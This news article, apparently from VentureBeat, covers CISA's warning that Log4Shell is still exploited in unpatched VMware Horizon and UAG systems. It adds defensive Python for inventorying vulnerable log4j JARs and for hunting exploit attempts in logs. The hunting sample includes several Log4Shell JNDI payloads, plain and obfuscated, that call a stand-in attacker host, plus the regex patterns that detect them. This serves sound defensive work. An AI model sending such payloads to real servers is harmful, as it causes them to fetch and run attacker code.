CISA warns that Log4Shell remains a threat



Last week, the Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory warning organizations that malicious threat actors continue to exploit the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon and Unified Access Gateway (UAG) to obtain initial access to systems that were never patched.

One of the most striking elements of the advisory is that CISA recommends all organizations with affected systems that did not deploy the patches promptly should assume they have been compromised and launch threat hunting activities.

Above all, the notice emphasizes that businesses that have not remediated Log4Shell are still at risk. At a minimum they should deploy the available patches, and if they cannot rule out an earlier intrusion they should hunt for one rather than treat patching alone as a fix.

A look at the history of Log4Shell

Alibaba's cloud security team first discovered the Log4Shell vulnerability and reported it to Apache on November 24, 2021.

The flaw lay in Apache Log4j 2, an open source library that Java applications use to record events and errors. Researchers first noticed attackers exploiting it to run malicious code remotely on Minecraft servers and clients: a single crafted string containing a JNDI lookup, once written to a log, caused the library to fetch and execute attacker-supplied code.

While Apache released a fix on December 9, Log4Shell had already gained a reputation as a severe zero-day vulnerability, with commentators warning that it "will wreak havoc over the Internet in the coming years," and an estimated 3 billion Java-running devices potentially exposed.

As publicity around the vulnerability increased, threat actors began targeting businesses around the world, with Microsoft observing a rise in activity including mass scanning, coin mining, the establishment of remote shells, and red-team activity.

Since then, the exploitation has shaken confidence in third-party cloud software: 95% of IT leaders report that Log4Shell was a major wake-up call for cloud security, and 87% say they now feel less confident about their cloud security than they did before the incident.

Is Log4Shell still a threat today?

Although months have passed since Log4Shell was first disclosed and many organizations have deployed the necessary patches, a large share have not. In April this year, a Rezilion report found that nearly 60% of the affected Log4j software packages remained unpatched.

CISA's recent warning highlights that failing to patch these systems can be a costly oversight, given that threat actors are still actively scanning for unpatched systems to exploit.

The most reliable way to reduce exposure to threats of this kind is an organized patching plan that ensures every Internet-facing server is patched and protected.

"Patching is a critical part of any organization's security plan, and devices that are connected to the Internet while not being patched, especially against a known and exploited vulnerability, pose a serious risk to the organizations and their customers," said Erich Kron, security awareness advocate at KnowBe4.

"While patching can be a challenge and even pose a real risk of an outage if there are problems, any organization that has Internet-enabled devices should have a system in place, and testing, to significantly reduce the risk," Kron said.

The security implications of failing to patch Log4j

At this point in the vulnerability's life cycle, failure to patch exposed systems is a serious lapse that indicates an organization has significant gaps in its existing security strategy.

"Patches for Log4j versions that are vulnerable to Log4Shell have been available since December. This includes patches for VMware products," said Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center (CyRC).

"Unfortunately, organizations that have not yet patched Log4j or VMware Horizon either lack a robust patch management strategy, whether it is a commercial or open source one, or have cases of shadow deployments," Mackey said.

Mackey stresses that while media coverage can be effective at prompting organizations to patch new vulnerabilities, it is no substitute for proactive monitoring for new exploits.

A look at solutions that address Log4Shell

Although fixing vulnerabilities in complex modern network environments is easier said than done, a growing number of patch management solutions let organizations push patches remotely and efficiently to many devices at once.

Many organizations already use patch management solutions to keep their devices up to date, with researchers expecting the global patch management market to grow from $652 million in 2022 to $1,084 million by 2027.

To address the Log4Shell vulnerability at a finer level, companies can use vulnerability scanning tools such as PortSwigger's Burp Suite Pro, Nmap, and Trend Micro's Log4j Vulnerability Tester to identify exposed systems and vulnerable Log4j files so they can remediate them. Network-side scanners only see what responds to a probe, so a host-side inventory of the JARs actually deployed, including copies bundled inside other archives, is needed to close the gap.
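A host-side inventory of the kind just described, as an added example written for this page rather than code from Trend Micro, Microsoft or any other vendor named here: it opens each archive in memory, looks for the JndiLookup class and the Maven pom.properties that genuine log4j-core JARs carry, recurses into archives nested inside WAR/EAR or fat JARs, and flags versions exposed to CVE-2021-44228. The archives scanned by `demo()` are constructed fixtures with hypothetical paths, so it runs offline; `scan_tree()` applies the same logic to a real directory.

```python
"""Added example: find log4j-core JARs, including ones nested inside WAR/EAR/
fat JARs, and flag versions exposed to Log4Shell (CVE-2021-44228).
Not code from Microsoft, Trend Micro or any other vendor named on the page."""
import io
import os
import zipfile

# Entries a genuine log4j-core JAR carries: the lookup class that performs the
# JNDI fetch, and the Maven metadata that records the artifact version.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties_text):
    """Pull 'version=2.14.1' out of a Maven pom.properties file."""
    for line in pom_properties_text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Suffixes are ignored."""
    parts = []
    for piece in version.split(".")[:3]:
        num = ""
        for ch in piece:
            if not ch.isdigit():
                break
            num += ch
        parts.append(int(num) if num else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def log4shell_vulnerable(version, has_jndi_lookup):
    """CVE-2021-44228 needs JndiLookup.class present AND log4j-core below 2.15.0
    (the Java 7 line fixed it in 2.12.2). A JAR with the class but no readable
    version is reported vulnerable so that a human looks at it. Later CVEs mean
    Apache's current advice is 2.17.1+ regardless of this result."""
    if not has_jndi_lookup:
        return False
    if version is None:
        return True
    v = version_tuple(version)
    if v[:2] == (2, 12):
        return v < (2, 12, 2)
    return v < (2, 15, 0)


def scan_archive(data, path, findings):
    """Inspect one archive held in memory and recurse into archives inside it
    (shaded JARs, WAR WEB-INF/lib, EAR modules). Appends result dicts to findings."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a ZIP container; nothing to inspect
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP in names
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        if has_jndi or version is not None:
            findings.append({"path": path, "version": version,
                             "has_jndi_lookup": has_jndi,
                             "vulnerable": log4shell_vulnerable(version, has_jndi)})
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXTS):
                scan_archive(zf.read(name), path + "!/" + name, findings)


def scan_tree(root):
    """Walk a directory tree (e.g. an application install) and scan every archive."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if filename.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, filename)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_sample_jar(version, include_jndi_lookup):
    """Constructed fixture: a minimal JAR carrying the metadata a real log4j-core
    JAR has. The class entry is placeholder bytes, not real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n" + f"version={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo():
    """Scan three constructed archives (hypothetical paths): an untouched 2.14.1,
    a 2.14.1 with JndiLookup.class deleted (Apache's documented stop-gap), and a
    WAR bundling 2.17.1 under WEB-INF/lib."""
    findings = []
    scan_archive(build_sample_jar("2.14.1", True), "/opt/app/lib/log4j-core-2.14.1.jar", findings)
    scan_archive(build_sample_jar("2.14.1", False), "/opt/app/lib/log4j-core-2.14.1-stripped.jar", findings)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", build_sample_jar("2.17.1", True))
    scan_archive(war.getvalue(), "/opt/app/portal.war", findings)
    return findings


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The nested-archive recursion is the part worth keeping: the Horizon and UAG installs CISA describes, like most Java deployments, do not ship log4j-core as a loose file, and a scanner that only matches filenames on disk reports them clean. A stripped JAR is recorded with `has_jndi_lookup` false so the inventory shows where the stop-gap mitigation was applied instead of an upgrade.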

It is also noteworthy that prominent technology vendors such as Microsoft and Google have released their own tooling to help businesses identify and mitigate Log4j exposure.

For example, Microsoft has extended Microsoft Defender to scan devices for vulnerable Log4j files, and Google Cloud's Cloud Logging lets businesses query their logs for attempts to exploit Log4j 2 and raise alerts when exploitation strings are written to them.
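Querying logs for the literal string `${jndi:` misses the obfuscated forms that appeared within days of disclosure (case lookups, default-value syntax, URL encoding), so a hunt of the kind CISA recommends has to normalize before matching. The following is an added example for this page, not Google Cloud's or Microsoft's detection logic: it collapses innermost Log4j lookups and URL encoding in a bounded loop, then matches the resulting `${jndi:<scheme>:` pattern over a constructed set of access-log lines (the client IPs and hostnames are documentation addresses, the paths and timestamps are invented).

```python
"""Added example: hunt for Log4Shell exploit attempts in web access logs,
including common obfuscations. Not Google Cloud or Microsoft Defender logic."""
import re
from urllib.parse import unquote

# Innermost Log4j lookups attackers use to hide the literal "jndi":
#   ${lower:j} / ${upper:J}        -> case lookups
#   ${::-j}, ${env:NOPE:-j}        -> default-value syntax
# Both patterns exclude a nested "${", so they only match the innermost lookup
# and the loop below peels layers from the inside out.
CASE_LOOKUP_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I)
DEFAULT_LOOKUP_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What remains after normalization: ${jndi:<scheme>:...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:[^}]*\}?", re.I)


def normalize(text, max_rounds=10):
    """Repeatedly URL-decode and collapse innermost lookups until the text is
    stable. Bounded so a hostile log line cannot keep the hunt looping."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = CASE_LOOKUP_RE.sub(lambda m: m.group(1), new)
        new = DEFAULT_LOOKUP_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_indicators(lines):
    """One hit per line containing a JNDI lookup after normalization: 1-based
    line number, lookup scheme (ldap, rmi, dns, ...) and the decoded payload.
    Matching is case-insensitive, so ${upper:...} obfuscation is covered too."""
    hits = []
    for lineno, raw in enumerate(lines, start=1):
        match = JNDI_RE.search(normalize(raw))
        if match:
            hits.append({"line_no": lineno,
                         "scheme": match.group(1).lower(),
                         "payload": match.group(0)})
    return hits


# Constructed sample access-log lines (RFC 5737 addresses, invented paths).
SAMPLE_LOGS = [
    '10.0.0.5 - - [24/Jun/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [24/Jun/2022:10:01:03 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9001 "-" "curl/7.79"',
    '10.0.0.9 - - [24/Jun/2022:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 77 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 77 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.23:1389/b}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:06 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fa.example.com%2Fc%7D HTTP/1.1" 200 77 "-" "-"',
    '10.0.0.9 - - [24/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 77 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.23:1099/d}"',
]

if __name__ == "__main__":
    for hit in find_jndi_indicators(SAMPLE_LOGS):
        print(hit)
```

Run this over every field the application logs, not only the request line: User-Agent, X-Forwarded-For and other headers, and form fields were all used in the wild. A hit means an attempt was logged, not that it succeeded; the confirming signal is the server itself opening an outbound LDAP or RMI connection to the host in the payload, which is what makes egress logs from Horizon and UAG hosts the other half of the hunt. The benign line that merely mentions "jndi-tutorial" is included to show that the match requires the lookup syntax, not the word.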

By combining patch management with proactive vulnerability scanning and log monitoring, organizations can identify vulnerable components such as Log4j, and attempts to exploit them, before an attacker succeeds.

VentureBeat’s mission is to be a digital town square for technical decision makers to acquire knowledge about transforming enterprise technology and conduct transactions. Learn more about membership.